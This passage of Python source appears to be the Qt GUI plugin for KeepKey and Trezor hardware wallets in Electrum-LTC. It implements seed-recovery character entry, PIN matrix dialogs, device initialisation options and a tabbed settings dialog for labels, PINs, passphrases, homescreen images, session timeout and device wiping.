"completed word and advance to the next one.\n"
"Press BACKSPACE to go back a character or word.\n"
"Press ENTER or the Seed Entered button once the last word in your "
"seed is auto-completed.")
class CharacterButton(QPushButton):
def __init__(self, text=None):
QPushButton.__init__(self, text)
def keyPressEvent(self, event):
event.setAccepted(False) # Pass through Enter and Space keys
class CharacterDialog(WindowModalDialog):
def __init__(self, parent):
super(CharacterDialog, self).__init__(parent)
self.setWindowTitle(_("KeepKey Seed Recovery"))
self.character_pos = 0
self.word_pos = 0
self.loop = QEventLoop()
self.word_help = QLabel()
self.char_buttons = []
vbox = QVBoxLayout(self)
vbox.addWidget(WWLabel(CHARACTER_RECOVERY))
hbox = QHBoxLayout()
hbox.addWidget(self.word_help)
for i in range(4):
char_button = CharacterButton('*')
char_button.setMaximumWidth(36)
self.char_buttons.append(char_button)
hbox.addWidget(char_button)
self.accept_button = CharacterButton(_("Accept Word"))
self.accept_button.clicked.connect(partial(self.process_key, 32))
self.rejected.connect(partial(self.loop.exit, 1))
hbox.addWidget(self.accept_button)
hbox.addStretch(1)
vbox.addLayout(hbox)
self.finished_button = QPushButton(_("Seed Entered"))
self.cancel_button = QPushButton(_("Cancel"))
self.finished_button.clicked.connect(partial(self.process_key,
Qt.Key_Return))
self.cancel_button.clicked.connect(self.rejected)
buttons = Buttons(self.finished_button, self.cancel_button)
vbox.addSpacing(40)
vbox.addLayout(buttons)
self.refresh()
self.show()
def refresh(self):
self.word_help.setText("Enter seed word %2d:" % (self.word_pos + 1))
self.accept_button.setEnabled(self.character_pos >= 3)
self.finished_button.setEnabled((self.word_pos in (11, 17, 23)
and self.character_pos >= 3))
for n, button in enumerate(self.char_buttons):
button.setEnabled(n == self.character_pos)
if n == self.character_pos:
button.setFocus()
def is_valid_alpha_space(self, key):
# Auto-completion requires at least 3 characters
if key == ord(' ') and self.character_pos >= 3:
return True
# Firmware aborts protocol if the 5th character is non-space
if self.character_pos >= 4:
return False
return (key >= ord('a') and key <= ord('z')
or (key >= ord('A') and key <= ord('Z')))
def process_key(self, key):
self.data = None
if key == Qt.Key_Return and self.finished_button.isEnabled():
self.data = {'done': True}
elif key == Qt.Key_Backspace and (self.word_pos or self.character_pos):
self.data = {'delete': True}
elif self.is_valid_alpha_space(key):
self.data = {'character': chr(key).lower()}
if self.data:
self.loop.exit(0)
def keyPressEvent(self, event):
self.process_key(event.key())
if not self.data:
QDialog.keyPressEvent(self, event)
def get_char(self, word_pos, character_pos):
self.word_pos = word_pos
self.character_pos = character_pos
self.refresh()
if self.loop.exec_():
self.data = None # User cancelled
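# Editor's note (descriptive, not in the original): CharacterDialog.get_char
# leaves the user's action in `self.data` as one of three shapes, which
# QtHandler.get_char below hands back to the device layer:
#   {'character': 'a'}  - one recovery-cipher letter typed
#   {'delete': True}    - backspace over a letter or word
#   {'done': True}      - the final seed word has been accepted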
class QtHandler(QtHandlerBase):
char_signal = pyqtSignal(object)
pin_signal = pyqtSignal(object)
def __init__(self, win, pin_matrix_widget_class, device):
super(QtHandler, self).__init__(win, device)
self.char_signal.connect(self.update_character_dialog)
self.pin_signal.connect(self.pin_dialog)
self.pin_matrix_widget_class = pin_matrix_widget_class
self.character_dialog = None
def get_char(self, msg):
self.done.clear()
self.char_signal.emit(msg)
self.done.wait()
data = self.character_dialog.data
if not data or 'done' in data:
self.character_dialog.accept()
self.character_dialog = None
return data
def get_pin(self, msg):
self.done.clear()
self.pin_signal.emit(msg)
self.done.wait()
return self.response
def pin_dialog(self, msg):
# Needed e.g. when resetting a device
self.clear_dialog()
dialog = WindowModalDialog(self.top_level_window(), _("Enter PIN"))
matrix = self.pin_matrix_widget_class()
vbox = QVBoxLayout()
vbox.addWidget(QLabel(msg))
vbox.addWidget(matrix)
vbox.addLayout(Buttons(CancelButton(dialog), OkButton(dialog)))
dialog.setLayout(vbox)
dialog.exec_()
self.response = str(matrix.get_value())
self.done.set()
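    # Editor's note (assumption, not in the original): the PIN matrix widget is
    # expected to show a scrambled 3x3 grid and get_value() to return the clicked
    # *positions* encoded as digits 1-9, so the actual PIN digits never leave the
    # layout shown on the device itself.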
def update_character_dialog(self, msg):
if not self.character_dialog:
self.character_dialog = CharacterDialog(self.top_level_window())
self.character_dialog.get_char(msg.word_pos, msg.character_pos)
self.done.set()
class QtPlugin(QtPluginBase):
# Derived classes must provide the following class-static variables:
# icon_file
# pin_matrix_widget_class
def create_handler(self, window):
return QtHandler(window, self.pin_matrix_widget_class(), self.device)
@hook
def receive_menu(self, menu, addrs, wallet):
if type(wallet) is not Standard_Wallet:
return
keystore = wallet.get_keystore()
if type(keystore) == self.keystore_class and len(addrs) == 1:
def show_address():
keystore.thread.add(partial(self.show_address, wallet, addrs[0]))
menu.addAction(_("Show on %s") % self.device, show_address)
def show_settings_dialog(self, window, keystore):
device_id = self.choose_device(window, keystore)
if device_id:
SettingsDialog(window, self, keystore, device_id).exec_()
def request_trezor_init_settings(self, wizard, method, device):
vbox = QVBoxLayout()
next_enabled = True
label = QLabel(_("Enter a label to name your device:"))
name = QLineEdit()
hl = QHBoxLayout()
hl.addWidget(label)
hl.addWidget(name)
hl.addStretch(1)
vbox.addLayout(hl)
def clean_text(widget):
text = unicode(widget.toPlainText()).strip()
return ' '.join(text.split())
if method in [TIM_NEW, TIM_RECOVER]:
gb = QGroupBox()
hbox1 = QHBoxLayout()
gb.setLayout(hbox1)
# KeepKey recovery doesn't need a word count
if method == TIM_NEW or self.device == 'TREZOR':
vbox.addWidget(gb)
gb.setTitle(_("Select your seed length:"))
bg = QButtonGroup()
for i, count in enumerate([12, 18, 24]):
rb = QRadioButton(gb)
rb.setText(_("%d words") % count)
bg.addButton(rb)
bg.setId(rb, i)
hbox1.addWidget(rb)
rb.setChecked(True)
cb_pin = QCheckBox(_('Enable PIN protection'))
cb_pin.setChecked(True)
else:
text = QTextEdit()
text.setMaximumHeight(60)
if method == TIM_MNEMONIC:
msg = _("Enter your BIP39 mnemonic:")
else:
msg = _("Enter the master private key beginning with xprv:")
def set_enabled():
from electrum_ltc.keystore import is_xprv
wizard.next_button.setEnabled(is_xprv(clean_text(text)))
text.textChanged.connect(set_enabled)
next_enabled = False
vbox.addWidget(QLabel(msg))
vbox.addWidget(text)
pin = QLineEdit()
pin.setValidator(QRegExpValidator(QRegExp('[1-9]{0,10}')))
pin.setMaximumWidth(100)
hbox_pin = QHBoxLayout()
hbox_pin.addWidget(QLabel(_("Enter your PIN (digits 1-9):")))
hbox_pin.addWidget(pin)
hbox_pin.addStretch(1)
if method in [TIM_NEW, TIM_RECOVER]:
vbox.addWidget(WWLabel(RECOMMEND_PIN))
vbox.addWidget(cb_pin)
else:
vbox.addLayout(hbox_pin)
passphrase_msg = WWLabel(PASSPHRASE_HELP_SHORT)
passphrase_warning = WWLabel(PASSPHRASE_NOT_PIN)
passphrase_warning.setStyleSheet("color: red")
cb_phrase = QCheckBox(_('Enable passphrases'))
cb_phrase.setChecked(False)
vbox.addWidget(passphrase_msg)
vbox.addWidget(passphrase_warning)
vbox.addWidget(cb_phrase)
wizard.exec_layout(vbox, next_enabled=next_enabled)
if method in [TIM_NEW, TIM_RECOVER]:
item = bg.checkedId()
pin = cb_pin.isChecked()
else:
item = ' '.join(str(clean_text(text)).split())
pin = str(pin.text())
return (item, unicode(name.text()), pin, cb_phrase.isChecked())
class SettingsDialog(WindowModalDialog):
'''This dialog doesn't require a device be paired with a wallet.
We want users to be able to wipe a device even if they've forgotten
their PIN.'''
def __init__(self, window, plugin, keystore, device_id):
title = _("%s Settings") % plugin.device
super(SettingsDialog, self).__init__(window, title)
self.setMaximumWidth(540)
devmgr = plugin.device_manager()
config = devmgr.config
handler = keystore.handler
thread = keystore.thread
hs_rows, hs_cols = (64, 128)
def invoke_client(method, *args, **kw_args):
unpair_after = kw_args.pop('unpair_after', False)
def task():
client = devmgr.client_by_id(device_id)
if not client:
raise RuntimeError("Device not connected")
if method:
getattr(client, method)(*args, **kw_args)
if unpair_after:
devmgr.unpair_id(device_id)
return client.features
thread.add(task, on_success=update)
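        # Editor's note (descriptive, not in the original): invoke_client runs a
        # device call on the keystore thread and refreshes this dialog from the
        # returned features on success; rename() below uses it as
        # invoke_client('change_label', ...) and invoke_client(None) at the end
        # simply re-reads the features.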
def update(features):
self.features = features
set_label_enabled()
bl_hash = features.bootloader_hash.encode('hex')
bl_hash = "\n".join([bl_hash[:32], bl_hash[32:]])
noyes = [_("No"), _("Yes")]
endis = [_("Enable Passphrases"), _("Disable Passphrases")]
disen = [_("Disabled"), _("Enabled")]
setchange = [_("Set a PIN"), _("Change PIN")]
version = "%d.%d.%d" % (features.major_version,
features.minor_version,
features.patch_version)
coins = ", ".join(coin.coin_name for coin in features.coins)
device_label.setText(features.label)
pin_set_label.setText(noyes[features.pin_protection])
passphrases_label.setText(disen[features.passphrase_protection])
bl_hash_label.setText(bl_hash)
label_edit.setText(features.label)
device_id_label.setText(features.device_id)
initialized_label.setText(noyes[features.initialized])
version_label.setText(version)
coins_label.setText(coins)
clear_pin_button.setVisible(features.pin_protection)
clear_pin_warning.setVisible(features.pin_protection)
pin_button.setText(setchange[features.pin_protection])
pin_msg.setVisible(not features.pin_protection)
passphrase_button.setText(endis[features.passphrase_protection])
language_label.setText(features.language)
def set_label_enabled():
label_apply.setEnabled(label_edit.text() != self.features.label)
def rename():
invoke_client('change_label', unicode(label_edit.text()))
def toggle_passphrase():
title = _("Confirm Toggle Passphrase Protection")
currently_enabled = self.features.passphrase_protection
if currently_enabled:
msg = _("After disabling passphrases, you can only pair this "
"Electrum wallet if it had an empty passphrase. "
"If its passphrase was not empty, you will need to "
"create a new wallet with the install wizard. You "
"can use this wallet again at any time by re-enabling "
"passphrases and entering its passphrase.")
else:
msg = _("Your current Electrum wallet can only be used with "
"an empty passphrase. You must create a separate "
"wallet with the install wizard for other passphrases "
"as each one generates a new set of addresses.")
msg += "\n\n" + _("Are you sure you want to proceed?")
if not self.question(msg, title=title):
return
invoke_client('toggle_passphrase', unpair_after=currently_enabled)
def change_homescreen():
from PIL import Image # FIXME
dialog = QFileDialog(self, _("Choose Homescreen"))
filename = dialog.getOpenFileName()
if filename:
im = Image.open(str(filename))
if im.size != (hs_cols, hs_rows):
raise Exception('Image must be 64 x 128 pixels')
im = im.convert('1')
pix = im.load()
img = ''
for j in range(hs_rows):
for i in range(hs_cols):
img += '1' if pix[i, j] else '0'
img = ''.join(chr(int(img[i:i + 8], 2))
for i in range(0, len(img), 8))
invoke_client('change_homescreen', img)
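        # Editor's note (descriptive, not in the original): the loop above packs
        # the 1-bit image row by row, 8 pixels per byte with the first pixel in
        # the most significant bit, before sending it to the device.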
def clear_homescreen():
invoke_client('change_homescreen', '\x00')
def set_pin():
invoke_client('set_pin', remove=False)
def clear_pin():
invoke_client('set_pin', remove=True)
def wipe_device():
wallet = window.wallet
if wallet and sum(wallet.get_balance()):
title = _("Confirm Device Wipe")
msg = _("Are you SURE you want to wipe the device?\n"
"Your wallet still has litecoins in it!")
if not self.question(msg, title=title,
icon=QMessageBox.Critical):
return
invoke_client('wipe_device', unpair_after=True)
def slider_moved():
mins = timeout_slider.sliderPosition()
timeout_minutes.setText(_("%2d minutes") % mins)
def slider_released():
config.set_session_timeout(timeout_slider.sliderPosition() * 60)
# Information tab
info_tab = QWidget()
info_layout = QVBoxLayout(info_tab)
info_glayout = QGridLayout()
info_glayout.setColumnStretch(2, 1)
device_label = QLabel()
pin_set_label = QLabel()
passphrases_label = QLabel()
version_label = QLabel()
device_id_label = QLabel()
bl_hash_label = QLabel()
bl_hash_label.setWordWrap(True)
coins_label = QLabel()
coins_label.setWordWrap(True)
language_label = QLabel()
initialized_label = QLabel()
rows = [
(_("Device Label"), device_label),
(_("PIN set"), pin_set_label),
(_("Passphrases"), passphrases_label),
(_("Firmware Version"), version_label),
(_("Device ID"), device_id_label),
(_("Bootloader Hash"), bl_hash_label),
(_("Supported Coins"), coins_label),
(_("Language"), language_label),
(_("Initialized"), initialized_label),
]
for row_num, (label, widget) in enumerate(rows):
info_glayout.addWidget(QLabel(label), row_num, 0)
info_glayout.addWidget(widget, row_num, 1)
info_layout.addLayout(info_glayout)
# Settings tab
settings_tab = QWidget()
settings_layout = QVBoxLayout(settings_tab)
settings_glayout = QGridLayout()
# Settings tab - Label
label_msg = QLabel(_("Name this %s. If you have mutiple devices "
"their labels help distinguish them.")
% plugin.device)
label_msg.setWordWrap(True)
label_label = QLabel(_("Device Label"))
label_edit = QLineEdit()
label_edit.setMinimumWidth(150)
label_edit.setMaxLength(plugin.MAX_LABEL_LEN)
label_apply = QPushButton(_("Apply"))
label_apply.clicked.connect(rename)
label_edit.textChanged.connect(set_label_enabled)
settings_glayout.addWidget(label_label, 0, 0)
settings_glayout.addWidget(label_edit, 0, 1, 1, 2)
settings_glayout.addWidget(label_apply, 0, 3)
settings_glayout.addWidget(label_msg, 1, 1, 1, -1)
# Settings tab - PIN
pin_label = QLabel(_("PIN Protection"))
pin_button = QPushButton()
pin_button.clicked.connect(set_pin)
settings_glayout.addWidget(pin_label, 2, 0)
settings_glayout.addWidget(pin_button, 2, 1)
pin_msg = QLabel(_("PIN protection is strongly recommended. "
"A PIN is your only protection against someone "
"stealing your litecoins if they obtain physical "
"access to your %s.") % plugin.device)
pin_msg.setWordWrap(True)
pin_msg.setStyleSheet("color: red")
settings_glayout.addWidget(pin_msg, 3, 1, 1, -1)
# Settings tab - Homescreen
if plugin.device != 'KeepKey': # Not yet supported by KK firmware
homescreen_layout = QHBoxLayout()
homescreen_label = QLabel(_("Homescreen"))
homescreen_change_button = QPushButton(_("Change..."))
homescreen_clear_button = QPushButton(_("Reset"))
homescreen_change_button.clicked.connect(change_homescreen)
homescreen_clear_button.clicked.connect(clear_homescreen)
homescreen_msg = QLabel(_("You can set the homescreen on your "
"device to personalize it. You must "
"choose a %d x %d monochrome black and "
"white image.") % (hs_rows, hs_cols))
homescreen_msg.setWordWrap(True)
settings_glayout.addWidget(homescreen_label, 4, 0)
settings_glayout.addWidget(homescreen_change_button, 4, 1)
settings_glayout.addWidget(homescreen_clear_button, 4, 2)
settings_glayout.addWidget(homescreen_msg, 5, 1, 1, -1)
# Settings tab - Session Timeout
timeout_label = QLabel(_("Session Timeout"))
timeout_minutes = QLabel()
timeout_slider = QSlider(Qt.Horizontal)
timeout_slider.setRange(1, 60)
timeout_slider.setSingleStep(1)
timeout_slider.setTickInterval(5)
timeout_slider.setTickPosition(QSlider.TicksBelow)
timeout_slider.setTracking(True)
timeout_msg = QLabel(
_("Clear the session after the specified period "
"of inactivity. Once a session has timed out, "
"your PIN and passphrase (if enabled) must be "
"re-entered to use the device."))
timeout_msg.setWordWrap(True)
timeout_slider.setSliderPosition(config.get_session_timeout() // 60)
slider_moved()
timeout_slider.valueChanged.connect(slider_moved)
timeout_slider.sliderReleased.connect(slider_released)
settings_glayout.addWidget(timeout_label, 6, 0)
settings_glayout.addWidget(timeout_slider, 6, 1, 1, 3)
settings_glayout.addWidget(timeout_minutes, 6, 4)
settings_glayout.addWidget(timeout_msg, 7, 1, 1, -1)
settings_layout.addLayout(settings_glayout)
settings_layout.addStretch(1)
# Advanced tab
advanced_tab = QWidget()
advanced_layout = QVBoxLayout(advanced_tab)
advanced_glayout = QGridLayout()
# Advanced tab - clear PIN
clear_pin_button = QPushButton(_("Disable PIN"))
clear_pin_button.clicked.connect(clear_pin)
clear_pin_warning = QLabel(
_("If you disable your PIN, anyone with physical access to your "
"%s device can spend your litecoins.") % plugin.device)
clear_pin_warning.setWordWrap(True)
clear_pin_warning.setStyleSheet("color: red")
advanced_glayout.addWidget(clear_pin_button, 0, 2)
advanced_glayout.addWidget(clear_pin_warning, 1, 0, 1, 5)
# Advanced tab - toggle passphrase protection
passphrase_button = QPushButton()
passphrase_button.clicked.connect(toggle_passphrase)
passphrase_msg = WWLabel(PASSPHRASE_HELP)
passphrase_warning = WWLabel(PASSPHRASE_NOT_PIN)
passphrase_warning.setStyleSheet("color: red")
advanced_glayout.addWidget(passphrase_button, 3, 2)
advanced_glayout.addWidget(passphrase_msg, 4, 0, 1, 5)
advanced_glayout.addWidget(passphrase_warning, 5, 0, 1, 5)
# Advanced tab - wipe device
wipe_device_button = QPushButton(_("Wipe Device"))
wipe_device_button.clicked.connect(wipe_device)
wipe_device_msg = QLabel(
_("Wipe the device, removing all data from it. The firmware "
"is left unchanged."))
wipe_device_msg.setWordWrap(True)
wipe_device_warning = QLabel(
_("Only wipe a device if you have the recovery seed written down "
"and the device wallet(s) are empty, otherwise the litecoins "
"will be lost forever."))
wipe_device_warning.setWordWrap(True)
wipe_device_warning.setStyleSheet("color: red")
advanced_glayout.addWidget(wipe_device_button, 6, 2)
advanced_glayout.addWidget(wipe_device_msg, 7, 0, 1, 5)
advanced_glayout.addWidget(wipe_device_warning, 8, 0, 1, 5)
advanced_layout.addLayout(advanced_glayout)
advanced_layout.addStretch(1)
tabs = QTabWidget(self)
tabs.addTab(info_tab, _("Information"))
tabs.addTab(settings_tab, _("Settings"))
tabs.addTab(advanced_tab, _("Advanced"))
dialog_vbox = QVBoxLayout(self)
dialog_vbox.addWidget(tabs)
dialog_vbox.addLayout(Buttons(CloseButton(self)))
# Update information
invoke_client(None)
| 41.794567 | 81 | 0.613966 |